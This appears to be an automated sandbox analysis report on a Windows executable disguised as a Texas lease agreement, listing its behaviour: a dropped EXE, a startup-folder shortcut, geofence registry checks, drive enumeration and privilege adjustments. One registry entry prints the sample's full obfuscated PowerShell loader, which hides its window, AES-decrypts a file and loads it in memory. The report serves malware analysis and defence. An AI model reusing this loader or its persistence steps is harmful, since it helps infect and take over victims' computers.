7790696bd3838fbdb54c2ef14e71e999c654e6639d41c166e9f1a713be1f0d00

Analysis

max time kernel
149s
max time network
152s
platform
windows10-2004_x64
resource
win10v2004-en-20220113
submitted
12-03-2022 14:22

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

One-Page-Lease-Agreement-Texas.exe
Size

261.0MB
MD5

7194384ed0ce511e24b0e119d0d068f6
SHA1

9ea9e3f52602988a922e8d8fda000f060be2b248
SHA256

7cc35fbce4b353c541f1ee62366248cc072d1c7ce38b1d5ef5db4a2414f26e08
SHA512

0faea84e368d301b7b056630b82c9f2a49f01252e66f5699ddf81f879d22fc74e08a810252e87a58cd9e5b147e9c1682678308781d08fd65e2edb2c8017c98d7

Score

8^/10

Malware Config

Signatures

Executes dropped EXE 1 IoCs

pid	Process
4396	iduebjqc.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	One-Page-Lease-Agreement-Texas.exe

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\eyDqoFiwUBttaIYCDkCXBUPxaGxw.lnk	One-Page-Lease-Agreement-Texas.exe

Loads dropped DLL 6 IoCs

pid	Process
4396	iduebjqc.exe
4396	iduebjqc.exe
3964	MsiExec.exe
3964	MsiExec.exe
3964	MsiExec.exe
3964	MsiExec.exe

Enumerates connected drives 3 TTPs 48 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\Z:	iduebjqc.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\B:	iduebjqc.exe
File opened (read-only)	\??\O:	iduebjqc.exe
File opened (read-only)	\??\P:	iduebjqc.exe
File opened (read-only)	\??\R:	iduebjqc.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\J:	iduebjqc.exe
File opened (read-only)	\??\M:	iduebjqc.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\H:	iduebjqc.exe
File opened (read-only)	\??\K:	iduebjqc.exe
File opened (read-only)	\??\X:	iduebjqc.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\Q:	iduebjqc.exe
File opened (read-only)	\??\T:	iduebjqc.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\E:	iduebjqc.exe
File opened (read-only)	\??\F:	iduebjqc.exe
File opened (read-only)	\??\L:	iduebjqc.exe
File opened (read-only)	\??\N:	iduebjqc.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\A:	iduebjqc.exe
File opened (read-only)	\??\Y:	iduebjqc.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\G:	iduebjqc.exe
File opened (read-only)	\??\W:	iduebjqc.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\I:	iduebjqc.exe
File opened (read-only)	\??\S:	iduebjqc.exe
File opened (read-only)	\??\U:	iduebjqc.exe
File opened (read-only)	\??\V:	iduebjqc.exe
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Modifies registry class 7 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\yechrywixkzazxgoclbxsph\shell	One-Page-Lease-Agreement-Texas.exe
Key created	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\yechrywixkzazxgoclbxsph\shell\open	One-Page-Lease-Agreement-Texas.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\yechrywixkzazxgoclbxsph\shell\open\command\ = "powershell -command \"$showWindowAsync=Add-Type -MemberDefinition ('['+'D'.ToUpper()+'ll'.ToLower()+'I'.ToUpper()+'mport('.ToLower()+[char]0x22+'user32.dll'.ToLower()+[char]0x22+')]public static extern bool '.ToLower()+'S'.ToUpper()+'how'.ToLower()+'W'.ToUpper()+'indow'.ToLower()+'A'.ToUpper()+'sync('.ToLower()+'I'.ToUpper()+'nt'.ToLower()+'P'.ToUpper()+'tr hWnd, int nCmdShow);'.ToLower()) -Name ('W'.ToUpper()+'in32'.ToLower()+'S'.ToUpper()+'how'.ToLower()+'W'.ToUpper()+'indow'.ToLower()+'A'.ToUpper()+'sync'.ToLower()) -Namespace Win32Functions -PassThru;$showWindowAsync::ShowWindowAsync((Get-Process -Id $pid).MainWindowHandle, 0);$AC=New-Object System.Security.Cryptography.AesCryptoServiceProvider;$AC.Key=[Convert]::FromBase64String('ggWCtN05dQLaZyRJ5b0VxCgZo3M8oTV/eM6siucTGPA=');$EB=[Convert]::FromBase64String([IO.File]::ReadAllText('C:\\Users\\Admin\\AppData\\Local\\Temp\\PoQNVvNZEgZozVP\\PptGnYfGJTsjAIQdA.XEIMYyBrmwTOYQPmdMQAvChFOjLmD'));$AC.IV = $EB[0..15];$Decryptor=$AC.CreateDecryptor();$UB=$Decryptor.TransformFinalBlock($EB, 16, $EB.Length-16);$AC.Dispose();[Reflection.Assembly]::Load($UB);[OX2ZGtuX4Enq17E.rm4m44ex6Y5ffYLh]::BDBOvPl7ZyRDJU_sfUSE();\""	One-Page-Lease-Agreement-Texas.exe
Key created	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\.xeimyybrmwtoyqpmdmqavchfojlmd	One-Page-Lease-Agreement-Texas.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\.xeimyybrmwtoyqpmdmqavchfojlmd\ = "yechrywixkzazxgoclbxsph"	One-Page-Lease-Agreement-Texas.exe
Key created	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\yechrywixkzazxgoclbxsph\shell\open\command	One-Page-Lease-Agreement-Texas.exe
Key created	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\yechrywixkzazxgoclbxsph	One-Page-Lease-Agreement-Texas.exe

Suspicious behavior: EnumeratesProcesses 7 IoCs

pid	Process
1164	One-Page-Lease-Agreement-Texas.exe
1164	One-Page-Lease-Agreement-Texas.exe
1164	One-Page-Lease-Agreement-Texas.exe
1164	One-Page-Lease-Agreement-Texas.exe
1164	One-Page-Lease-Agreement-Texas.exe
1164	One-Page-Lease-Agreement-Texas.exe
1164	One-Page-Lease-Agreement-Texas.exe

Suspicious use of AdjustPrivilegeToken 60 IoCs

description	pid	Process
Token: SeCreateTokenPrivilege	4396	iduebjqc.exe
Token: SeAssignPrimaryTokenPrivilege	4396	iduebjqc.exe
Token: SeLockMemoryPrivilege	4396	iduebjqc.exe
Token: SeIncreaseQuotaPrivilege	4396	iduebjqc.exe
Token: SeMachineAccountPrivilege	4396	iduebjqc.exe
Token: SeTcbPrivilege	4396	iduebjqc.exe
Token: SeSecurityPrivilege	4396	iduebjqc.exe
Token: SeTakeOwnershipPrivilege	4396	iduebjqc.exe
Token: SeLoadDriverPrivilege	4396	iduebjqc.exe
Token: SeSystemProfilePrivilege	4396	iduebjqc.exe
Token: SeSystemtimePrivilege	4396	iduebjqc.exe
Token: SeProfSingleProcessPrivilege	4396	iduebjqc.exe
Token: SeIncBasePriorityPrivilege	4396	iduebjqc.exe
Token: SeCreatePagefilePrivilege	4396	iduebjqc.exe
Token: SeCreatePermanentPrivilege	4396	iduebjqc.exe
Token: SeBackupPrivilege	4396	iduebjqc.exe
Token: SeRestorePrivilege	4396	iduebjqc.exe
Token: SeShutdownPrivilege	4396	iduebjqc.exe
Token: SeDebugPrivilege	4396	iduebjqc.exe
Token: SeAuditPrivilege	4396	iduebjqc.exe
Token: SeSystemEnvironmentPrivilege	4396	iduebjqc.exe
Token: SeChangeNotifyPrivilege	4396	iduebjqc.exe
Token: SeRemoteShutdownPrivilege	4396	iduebjqc.exe
Token: SeUndockPrivilege	4396	iduebjqc.exe
Token: SeSyncAgentPrivilege	4396	iduebjqc.exe
Token: SeEnableDelegationPrivilege	4396	iduebjqc.exe
Token: SeManageVolumePrivilege	4396	iduebjqc.exe
Token: SeImpersonatePrivilege	4396	iduebjqc.exe
Token: SeCreateGlobalPrivilege	4396	iduebjqc.exe
Token: SeSecurityPrivilege	1800	msiexec.exe
Token: SeCreateTokenPrivilege	4396	iduebjqc.exe
Token: SeAssignPrimaryTokenPrivilege	4396	iduebjqc.exe
Token: SeLockMemoryPrivilege	4396	iduebjqc.exe
Token: SeIncreaseQuotaPrivilege	4396	iduebjqc.exe
Token: SeMachineAccountPrivilege	4396	iduebjqc.exe
Token: SeTcbPrivilege	4396	iduebjqc.exe
Token: SeSecurityPrivilege	4396	iduebjqc.exe
Token: SeTakeOwnershipPrivilege	4396	iduebjqc.exe
Token: SeLoadDriverPrivilege	4396	iduebjqc.exe
Token: SeSystemProfilePrivilege	4396	iduebjqc.exe
Token: SeSystemtimePrivilege	4396	iduebjqc.exe
Token: SeProfSingleProcessPrivilege	4396	iduebjqc.exe
Token: SeIncBasePriorityPrivilege	4396	iduebjqc.exe
Token: SeCreatePagefilePrivilege	4396	iduebjqc.exe
Token: SeCreatePermanentPrivilege	4396	iduebjqc.exe
Token: SeBackupPrivilege	4396	iduebjqc.exe
Token: SeRestorePrivilege	4396	iduebjqc.exe
Token: SeShutdownPrivilege	4396	iduebjqc.exe
Token: SeDebugPrivilege	4396	iduebjqc.exe
Token: SeAuditPrivilege	4396	iduebjqc.exe
Token: SeSystemEnvironmentPrivilege	4396	iduebjqc.exe
Token: SeChangeNotifyPrivilege	4396	iduebjqc.exe
Token: SeRemoteShutdownPrivilege	4396	iduebjqc.exe
Token: SeUndockPrivilege	4396	iduebjqc.exe
Token: SeSyncAgentPrivilege	4396	iduebjqc.exe
Token: SeEnableDelegationPrivilege	4396	iduebjqc.exe
Token: SeManageVolumePrivilege	4396	iduebjqc.exe
Token: SeImpersonatePrivilege	4396	iduebjqc.exe
Token: SeCreateGlobalPrivilege	4396	iduebjqc.exe
Token: SeDebugPrivilege	1164	One-Page-Lease-Agreement-Texas.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
4396	iduebjqc.exe

Suspicious use of WriteProcessMemory 12 IoCs

description	pid	Process	procid_target
PID 4556 wrote to memory of 4396	4556	One-Page-Lease-Agreement-Texas.exe	85
PID 4556 wrote to memory of 4396	4556	One-Page-Lease-Agreement-Texas.exe	85
PID 4556 wrote to memory of 4396	4556	One-Page-Lease-Agreement-Texas.exe	85
PID 4556 wrote to memory of 1164	4556	One-Page-Lease-Agreement-Texas.exe	86
PID 4556 wrote to memory of 1164	4556	One-Page-Lease-Agreement-Texas.exe	86
PID 1800 wrote to memory of 3964	1800	msiexec.exe	91
PID 1800 wrote to memory of 3964	1800	msiexec.exe	91
PID 1800 wrote to memory of 3964	1800	msiexec.exe	91
PID 1164 wrote to memory of 2016	1164	One-Page-Lease-Agreement-Texas.exe	95
PID 1164 wrote to memory of 2016	1164	One-Page-Lease-Agreement-Texas.exe	95
PID 2016 wrote to memory of 4440	2016	csc.exe	97
PID 2016 wrote to memory of 4440	2016	csc.exe	97

C:\Users\Admin\AppData\Local\Temp\One-Page-Lease-Agreement-Texas.exe
"C:\Users\Admin\AppData\Local\Temp\One-Page-Lease-Agreement-Texas.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4556
- C:\Users\Admin\AppData\Local\Temp\iduebjqc.exe
  "C:\Users\Admin\AppData\Local\Temp\iduebjqc.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Enumerates connected drives
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  PID:4396
- C:\Users\Admin\AppData\Local\Temp\One-Page-Lease-Agreement-Texas.exe
  "C:\Users\Admin\AppData\Local\Temp\One-Page-Lease-Agreement-Texas.exe" /y
  2⤵
  - Drops startup file
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1164
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\krus1utw\krus1utw.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2016
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES830E.tmp" "c:\Users\Admin\AppData\Local\Temp\krus1utw\CSC456D158DA3C24CA780828AD6FFF34C5.TMP"
      4⤵
      PID:4440

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1800
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding F777F4F00FC961CCE46EC3725A517D45 C
  2⤵
  - Loads dropped DLL
  PID:3964

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/1164-136-0x00007FFC005C0000-0x00007FFC01081000-memory.dmp

Filesize
10.8MB

Download
memory/1164-149-0x000001B239B50000-0x000001B239B72000-memory.dmp

Filesize
136KB

Download
memory/1164-137-0x000001B253C20000-0x000001B253C22000-memory.dmp

Filesize
8KB

Download
memory/1164-155-0x000001B253C23000-0x000001B253C25000-memory.dmp

Filesize
8KB

Download
memory/4396-140-0x0000000002FD0000-0x0000000002FD1000-memory.dmp

Filesize
4KB

Download
memory/4556-130-0x00000228CB510000-0x00000228CB9B8000-memory.dmp

Filesize
4.7MB

Download
memory/4556-131-0x00007FFC005C0000-0x00007FFC01081000-memory.dmp

Filesize
10.8MB

Download
memory/4556-132-0x00000228E7460000-0x00000228E7462000-memory.dmp

Filesize
8KB

Download